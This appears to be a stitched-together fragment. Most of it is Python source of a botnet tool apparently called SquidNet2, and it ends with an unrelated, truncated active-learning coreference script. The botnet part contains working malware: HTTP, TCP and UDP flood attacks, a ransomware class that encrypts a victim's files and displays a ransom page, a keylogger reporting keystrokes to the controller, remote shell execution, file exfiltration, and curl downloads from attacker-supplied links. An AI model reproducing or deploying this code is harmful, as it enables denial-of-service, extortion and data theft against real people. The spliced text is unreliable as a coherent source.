5.1- SV1- .NET CLR 1.1.4322', 'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)', 'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)', 'Mozilla/4.0 (compatible; MSIE 
7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)', 'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)', 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS 
X; fr)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)', 'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)', 'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'] return user_agents def stop_atk(self): self.stopatk = True def build_querystr(self, value): result = '' for i in range(value): item = random.randint(65, 100) result += chr(item) return result def ddos(self): code = 0 if not self.stopatk: try: agent = random.choice(self.useragents) req = urllib.request.Request(self.ip, headers={'User-Agent': agent, 'Referer': random.choice( self.referers) + self.build_querystr( random.randint(50, 100)), 'Cache-Control': 'no-cache', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive': random.randint(110, 160), 'Connection': 'keep-alive'}) urllib.request.urlopen(req) code = 200 except 
urllib.error.HTTPError as e: code_split = str(e).split() code = code_split[2] code = str(code[0] + code[1] + code[2]) if "500" in str(e): code = 500 elif "429" in str(e): code = 500 elif code.startswith('5'): code = 500 except urllib.error.URLError as e: if "A connection attempt failed" in str(e): code = 500 except: pass return code def start_thr(self): while True: try: x = threading.Thread(target=self.ddos) x.start() time.sleep(self.delay) if self.stopatk: break except: pass def ddos_start(self): while True: try: http_code = self.ddos() if http_code == 500: break if self.stopatk: break except: pass class TCP_UDP_Flood: def __init__(self, ip, port, delay, pkt_size): self.ip = ip self.port = int(port) self.delay = float(delay) self.pkt_size = int(pkt_size) self.stop = False def gen_packet(self, size): return random._urandom(size) def UDP_Req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port)) s.close() except: pass def TCP_req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.ip, self.port)) s.send(self.gen_packet(self.pkt_size)) s.close() except: pass def Stop_Atk(self): self.stop = True def TCP_Flood(self): while True: try: tcp_req = threading.Thread(target=self.TCP_req) tcp_req.start() if self.stop: break time.sleep(self.delay) except: pass def UDP_Flood(self): while True: try: udp_req = threading.Thread(target=self.UDP_Req) udp_req.start() if self.stop: break time.sleep(self.delay) except: pass class RansomWare: def __init__(self, key): self.key = key self.fernet = Fernet(self.key) self.dirlist = [] self.filelist = [] self.keyfile = "key.txt" self.recovery_directory = "" if sys.platform == "win32": os.chdir("C:/Users/") self.recovery_directory = f"C:/Users/{os.getlogin()}/" else: self.recovery_directory = "/" os.chdir("/") def get_dir_list(self): for i in os.listdir(): try: file = open(i, "rb") file.close() self.filelist.append(os.path.join(os.getcwd(),i)) except: self.dirlist.append(os.path.join(os.getcwd(), i)) def encrypt_file(self, file): try: with open(file, "rb") as og_file: content = self.fernet.encrypt(og_file.read()) og_file.close() with open(file, "wb") as enc_file: enc_file.write(content) enc_file.close() except: pass def encrypt(self): self.get_dir_list() for i in self.dirlist: try: os.chdir(i) self.get_dir_list() except: pass for i in self.filelist: file_thread = threading.Thread(target=self.encrypt_file, args=(i,)) file_thread.start() self.ransom() self.checker = threading.Thread(target=self.check_key_file) self.checker.start() def decrypt(self): for i in self.filelist: try: with open(i,"rb") as enc_file: content = self.fernet.decrypt(enc_file.read()) enc_file.close() with open(i,"wb") as new_file: new_file.write(content) new_file.close() except: pass def download_emotional_support(self): cmd = subprocess.Popen(f"cd {self.recovery_directory}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) _cmd = subprocess.Popen(f"curl -o barbara.png https://i.redd.it/w2eduogz9ir51.png", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) def recovering_html_code(self): return f''' <!DOCTYPE html> <head></head> <title>You're in Luck | Your files are being decrypted!</title> <body bgcolor='red'> <h1>Lucky you!</h1> <h2>You have successfully put the correct encryption key into the text file({self.keyfile}).</h2> <h2>Please wait a moment, as the decrypted files are being decrypted at this moment. 
<h4>You can say your goodbyes to Barbara!</h4> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def ransom_html_code(self): return f''' <!DOCTYPE html> <head></head> <body bgcolor='red'> <title>Oops! | You've been Compromised!</title> <h1>Oops!</h1> <h2>Looks like your files have been encrypted.</h2> <h3>There is hope.</h3><br> A file has been created in this directory: {self.recovery_directory}{self.keyfile}<br> Simply place the encryption key of your files in the file(and this file only), and you will have your files back!<br> How you will get your key? Well, that's all up to the BotMaster. <h2>Heres a picture of Barbara! Perhaps she will give you emotional Support....</h2><br> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def check_key_file(self): while True: try: file = open(f"{self.recovery_directory}{self.keyfile}","rb") content = file.read() if bytes(content.strip()) == self.key: self.decryptor = threading.Thread(target=self.decrypt) self.decryptor.start() self.ransom(True) break time.sleep(1) except: pass def ransom(self, recovering=False): os.chdir(self.recovery_directory) if not recovering: keyfile = open(self.keyfile,"w") keyfile.close() self.download_emotional_support() filename = "Oops.html" else: filename = "Yay.html" bot.make_selffiles_encrypted_false() file = open(f"{self.recovery_directory}{filename}","w") if recovering: file.write(self.recovering_html_code()) else: file.write(self.ransom_html_code()) file.close() if sys.platform == "win32": os.startfile(file.name) else: os.system(f"open {file.name}") class Bot: def __init__(self, ip, port, enc_key): self.ip = ip self.port = port self.sendingfile = False self.enc_key = enc_key self.can_encrypt = False self.files_encrypted = False self.sql_connected = False self.keylogging = False self.keylogthreadstarted = False try: self.fernet = Fernet(self.enc_key) self.can_encrypt = True except: pass self.writefile = None self.writing_mode = False def get_ip(self): try: return urllib.request.urlopen(urllib.request.Request(url="https://httpbin.org/ip")).read().decode().strip().split('"')[3] except: try: return socket.gethostbyname(socket.gethostname()) except: return "127.0.0.1" def get_info(self): return f"!botreg {socket.gethostname()} {self.get_ip()} {os.getlogin()} {sys.platform}".encode() def connect(self): while True: try: self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.client.connect((self.ip, self.port)) banner = self.client.recv(1024).decode() time.sleep(5) break except: self.client.close() try: self.client.send(self.get_info()) except: pass reciever = threading.Thread(target=self.recv).start() self.pkt_sender = threading.Thread(target=self.check_still_connected).start() def initiate_connection(self): connect = threading.Thread(target=self.connect).start() def get_filename(self, msg): msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def make_selffiles_encrypted_false(self): self.files_encrypted = False def check_still_connected(self): while True: try: self.client.send("".encode()) time.sleep(10) except: while True: try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def recv(self): while True: try: msg = self.client.recv(10240).decode() if not self.sendingfile: while True: try: handle_msg = threading.Thread(target=self.send, args=(msg,)).start() break except RuntimeError: pass except Exception as e: self.client.close() while True: 
try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def exec_sql_cmd(self, sqlfile, cmd): sql = sqlite3.connect(sqlfile) cursor = sql.cursor() cursor.execute(cmd) output = str(cursor.fetchall()) sql.commit() cursor.close() sql.close() return output def on_press(self, key): if self.keylogging: self.client.send(f"!key {key}".encode()) def on_release(self, key): pass def start_keylog(self): try: with Listener(on_press=self.on_press, on_release=self.on_release) as L: L.join() except: pass def return_actual_dir(self, direc): return direc.replace("%user%",os.getlogin()) def send(self, msg): msg = str(msg) if not self.writing_mode and not self.sql_connected: try: if msg.startswith("!open"): filename = self.get_filename(msg) if sys.platform == "win32": os.startfile(filename) else: os.system(f"open {filename}") elif msg.startswith("!keylog"): if not self.keylogging: if not self.keylogthreadstarted: keylogger = threading.Thread(target=self.start_keylog) keylogger.start() self.keylogging = True self.keylogthreadstarted = True elif msg.startswith("!stopkeylog"): self.keylogging = False elif msg.startswith('!httpflood'): msg = msg.split() ip = msg[1] delay = float(msg[2]) self.dos = DDoS(ip, delay) elif msg.startswith("!sqlconnect"): try: self.sql_connected = True self.sql_file = self.get_filename(msg) file = open(self.sql_file,"rb") file.close() item = self.exec_sql_cmd(self.sql_file, "select sql from sqlite_master") self.client.send(f"Successfully connected to the Database file: {self.sql_file}".encode()) except Exception as e: self.client.send(f"There was an error connecting to file '{self.sql_file}': {e}".encode()) self.sql_connected = False elif msg.startswith("!stopatk"): try: self.dos.stop_atk() except: pass try: self.tcpflood.Stop_Atk() except: pass try: self.udpflood.Stop_Atk() except: pass elif msg.startswith("!tcpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood) self.tcp_flood.start() elif msg.startswith("!udpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood) self.udp_flood.start() elif msg.startswith("!getcwd"): cwd = os.getcwd() self.client.send(f"Current working directory: {os.getcwd()}".encode()) elif msg.startswith("!changedir"): newdir = self.return_actual_dir(self.get_filename(msg)) os.chdir(newdir) elif msg.startswith("!viewfilecontent"): file = msg.split()[1] self.client.send(open(file, "rb").read()) elif msg.startswith("!listdir"): self.client.send(f"Files in dir {os.getcwd()}: {os.listdir()}".encode()) elif msg.startswith("!mkdir"): dir = self.get_filename(msg) os.mkdir(dir) elif msg.startswith("!ransomware"): if not self.files_encrypted: self.ransomware = RansomWare(self.enc_key) self.ransomware.encrypt() self.files_encrypted = True elif msg.startswith("!createfile"): file = self.get_filename(msg) if file in os.listdir(): file += f"{random.randint(0,123456789)}" fileopened = open(file, "w") fileopened.close() elif msg.startswith("!delfile"): file = self.get_filename(msg) 
os.remove(file) self.client.send(f"File {file} has been deleted.".encode()) elif msg.startswith("!delfolder"): folder = self.get_filename(msg) shutil.rmtree(folder) self.client.send(f"Folder {folder} has been deleted.".encode()) elif msg.startswith("!writefile"): file = self.get_filename(msg) self.writefile = open(file, "rb") content = self.writefile.read() self.writefile.close() self.writefile = self.writefile.name self.writing_mode = True elif msg.startswith("!encfile"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") content = self.fernet.encrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been encrypted.".encode()) else: self.client.send("Cannot encrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!decrypt"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") try: content = self.fernet.decrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been decrypted.".encode()) except Exception as e: self.client.send(f"There was en error with decrypting file {file}.".encode()) else: self.client.send("Cannot decrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!filedownload"): try: file = self.get_filename(msg) file = open(file, "rb") self.sendingfile = True while True: sendto = file.read(10240) if not sendto: time.sleep(3) self.client.send("!stopsave".encode()) self.sendingfile = False break else: self.client.send(sendto) time.sleep(1) self.client.send("File transfer to server completed.".encode()) except: self.client.send("File was not found in the bot directory.".encode()) time.sleep(3) self.client.send("!stopsave".encode()) elif msg.startswith("!download"): try: link = msg.split()[1] file = msg.split()[2] cmd = subprocess.Popen(f"curl -o {file} {link}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(f"File {file} has been downloaded from {link}.".encode()) except: self.client.send(f"There was an error with downloading the file.".encode()) else: cmd = subprocess.Popen(msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(cmd.stdout.read()) self.client.send(cmd.stderr.read()) except Exception as e: pass elif self.writing_mode: write_msg = f"\\n{msg}".encode() if msg == "!stopwrite": self.writing_mode = False else: file = open(self.writefile, "rb") content = file.read() file.close() file = open(self.writefile,"wb") file.write(content) file.write(write_msg) elif self.sql_connected: if msg.startswith("!stopsql"): self.sql_connected = False self.client.send("Disconnecting from the Sqlite3 Database file.".encode()) else: try: output = self.exec_sql_cmd(self.sql_file, msg) self.client.send(output.encode()) except Exception as e: self.client.send(f"There was an error in the Database file: {e}".encode()) bot = Bot('"""+self.external_ip+"""',"""+str(self.external_port)+""", """+str(self.enc_key)+""") bot.initiate_connection() """ return payload class AutoUpdate: def __init__(self): self.version = 4.0 def check_update(self): print(BotNet.logo(None)) print("[+] Checking for updates.....") version = self.version - 1.0 updated = False try: req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/SquidNet2Version.json") recv = 
urllib.request.urlopen(req).read().decode() version_info = open("SquidNet2Version.json","w") version_info.write(recv) version_info.close() json_info = json.load(open(version_info.name,"r")) version = float(json_info[0]["SquidNet2"]) except: print("[+] There was an error with checking updates, starting SquidNet2.") if version > self.version: print(f"[+] Your Version of SquidNet2 is outdated. You have version {self.version}, whereas the current update is version v{version}.") update = input("\n[+] Do you wish to update?(y/n): ").lower() if update == "y" or update == "yes": print(f"[+] Updating SquidNet2 to v{version}") updated = True req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/MainScripts/SquidNet2.py") resp = urllib.request.urlopen(req).read() file = open(sys.argv[0],"wb") file.write(resp) file.close() else: print("[+] Choosing not to update.") if not updated: if sys.platform == "win32": os.system("cls") else: os.system("clear") Squidnet = Config(self.version) Squidnet.read_config() else: print("[+] Restart the Script to have the Update be effective!") class Config: """Class needed for using the config file.""" def __init__(self, version): self.version = version self.config_file = "server.config" def read_config(self): """The config file is read here, where the variables that are in the file are used for the main server.""" try: file = open(self.config_file,"r") content = file.readlines() for i in content: if i.startswith("\nhostip") or i.startswith("hostip"): hostip = i.replace("=","").split()[1] elif i.startswith("\nhostport") or i.startswith("hostport"): hostport = int(i.replace("=","").split()[1]) elif i.startswith("\nexternal_host") or i.startswith("external_host"): external_host = i.replace("=","").split()[1] elif i.startswith("\nexternal_port") or i.startswith("external_port"): external_port = int(i.replace("=","").split()[1]) elif i.startswith("\nlogfile") or i.startswith("logfile"): logfile = i.replace("=","").split()[1] elif i.startswith("\nadmin_name") or i.startswith("admin_name"): admin_name = i.replace("=","").split()[1] elif i.startswith("\nadmin_password") or i.startswith("admin_password"): admin_password = i.replace("=","").split()[1] elif i.startswith("\nenc_key") or i.startswith("enc_key"): enc_key = f"{i.replace('=','').split()[1]}=".encode() elif i.startswith("\nftp_dir") or i.startswith("ftp_dir"): ftp_dir = i.replace("=","").split()[1] elif i.startswith("\nransomware_active") or i.startswith("ransomware_active"): ransomware_active = i.replace("=","").split()[1] if ransomware_active.lower() == "f": ransomware_active = False else: ransomware_active = True Squidnet = BotNet(hostip, hostport, self.version, external_host, external_port, admin_name, admin_password, logfile, enc_key, ftp_dir, ransomware_active) Squidnet.start() except Exception as e: self.gen_config_file() def gen_config_file(self): """If there is an error in the usage of the config file, a new config file will be generated, and the user can simply restart the script to have a functional server.""" print(BotNet.logo(None)) print("[+] There is an error in the config file. 
Re-writing and re-formatting to be able to be used by the server.") gen_content = """ hostip = localhost hostport = 8080 external_host = localhost external_port = 8080 logfile = log.txt admin_name = admin admin_password = adminpassword12345 enc_key = iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8= ftp_dir = Bot_Files ransomware_active = f """ file = open(self.config_file,"w") file.write(gen_content) file.close() print("[+] The Config file has been reformatted and is now usable by the server! Restart the script to start the server.") item = AutoUpdate() item.check_update()
import argparse import torch import numpy as np import pathlib from train_active import finetune_on_queries from incremental import Incremental from inference import Predictor from score import Scorer import util import copy from collections import defaultdict import logging import json from eval_all import ALL def load_model(config, fp): model = Incremental(config) util.load_params(model, fp, "model") logging.info(f"Updating threshold to {config['threshold']}") model.set_threshold(config["threshold"]) return model def update_queries(queries, span_scores, n, c, read_docs=None): """ Assumes [span_scores] is sorted in descending order according to score. Adds at most [n] entries from [span_scores] to [queries] with highest score. Avoids adding duplicate spans. While adding queries, constrain added spans from set of at most [c] documents by taking top-[c] spans and then constraining the rest of added spans to belong only in the same documents as those [c] spans. [read_docs] is set containing docs already read (for mixed-ent) """ if read_docs is None: read_docs = set() num_spans = n for span_score in span_scores: if n <= 0: # stop, already queried enough spans break doc_key = span_score['doc_key'] if span_score['span'] in queries.get(doc_key, []): # skip duplicate span continue else: if len(read_docs) < c: # add span to queries queries[doc_key].append(span_score['span']) n -= 1 # add to constrained docs read_docs.add(doc_key) else: if doc_key in read_docs: # only add span to queries if in constrained docs queries[doc_key].append(span_score['span']) n -= 1 logging.info(f'Added {num_spans-n} spans belonging to {len(read_docs)} docs') return read_docs def sample_spans(model, dataset, queries, config, scoring, cycle): """ Sample spans for active learning by scoring spans based on strategy and picking the top-scoring spans. Does not sample duplicate spans that are already queried. - [model]: acquisition model - [dataset]: data to sample from - [queries]: spans that are already queried before - [config]: simulation hyperparameters - [scoring]: active learning strategy - [cycle]: the cycle number """ scorer = Scorer(model, dataset) SCORING = { 'random-ment': scorer.random_ment, 'mention': scorer.mention_detection, 'cond-ent':scorer.conditional_entropy, 'random':scorer.random, 'ment-ent':scorer.mention_entropy, 'joint-ent':scorer.joint_entropy, 'clust-ent':scorer.cluster_entropy, 'li-clust-ent':scorer.li_entropy } with torch.no_grad(): span_scores = SCORING[scoring]( cycle=cycle, num_cycles=config['num_cycles'] ) # sort scores in descending order span_scores.sort(key = lambda k : k['score'], reverse=True) # add to [queries] update_queries(queries, span_scores, config['num_spans'], config['max_docs']) # return all spans with their scores return span_scores def extract_data(dataset, queries): """ From [dataset], extract antecedent annotations for [queries]. 
Returns (new_data, num_queries) where: - [new_data] is a subset of [dataset] which contains annotations only for spans in [queries] - [num_queries] is number of annotated spans in [new_data] """ stop = len(queries) new_data = [] num_queries = 0 # iterate over [dataset] with stopping condition for faster search for doc in dataset: if stop <= 0: # already queried labels for all sampled spans break doc_key = doc['doc_key'] if doc_key in queries: # at least one span in doc was queried gold_map = doc['antecedent_map'] # get most recent antecedent for queried spans sub_map = {} for span in queries.get(doc_key, []): if span in gold_map: ante = gold_map[span] if type(ante) is list: # grab most recent antecedent if not '0' cluster ante = [max(ante)] sub_map[span] = ante else: sub_map[span] = None num_queries += 1 if len(sub_map) > 0: # create new copy of doc with new sub_map new_doc = copy.copy(doc) new_doc['antecedent_map'] = sub_map new_data.append(new_doc) stop -= 1 return new_data, num_queries def load_queries(fp): num_queries = 0 if not fp.exists(): return defaultdict(list), num_queries with open(fp, 'r') as f: queries = json.load(f) # replaces tuples for doc_key, spans in queries.items(): tuple_spans = [] for span in spans: tuple_spans.append(tuple(span)) queries[doc_key] = tuple_spans num_queries += len(tuple_spans) # convert to defaultdict queries = defaultdict(list, queries) # return queries and # of queried spans return queries, num_queries def output_results(fp, config, cycle, scores): results = { 'seed': config['seed'], 'strategy': config['strategy'], 'cycle': cycle, 'num_spans': config['num_spans'], 'max_docs': config['max_docs'], } results.update(scores) with open(fp, 'w') as f: json.dump(results, f) return def create_cycle_dir(config, idx): # store results in {sim_dir} / {seed} / {strategy} / {num_spans}spans-{max_docs}docs / {cycle #} spans_docs = f'{config["num_spans"]}spans-{config["max_docs"]}docs' cycle_dir = config['sim_dir'] / str(config['seed']) / spans_docs / config['strategy'] / f'cycle{idx}' cycle_dir.mkdir(parents=True, exist_ok=True) change_log(cycle_dir / 'out.log') return cycle_dir def eval_scores(model, config, data_prefix, preds_file=None): """ Evaluate [model] on test or dev set based on [data_prefix]. Output F1 and mention detection accuracy. """ logging.info(f'Evaluating on {data_prefix}') data = util.load_data(config[f"{data_prefix}_path"]) evaluator = Predictor(model, data, config["singleton_eval"]) with torch.no_grad(): f1 = evaluator.evaluate() mentions = evaluator.evaluators[ALL].evaluators[3].get_f1() scores = {'f1': f1, 'mentions': mentions} if preds_file: evaluator.write_preds(preds_file) logging.info(f"Wrote preds to {preds_file}") return scores def simulation(config, data_train): """ Run active learning simulation by sampling data from unlabeled pool, using gold data to label sampled spans, and then finetuning model on labeled data. - [config]: contains all simulation hyperparameters - [data_train]: data pool to sample from """ # initialize acquisition model as source model logging.info(f'Loading acq. 
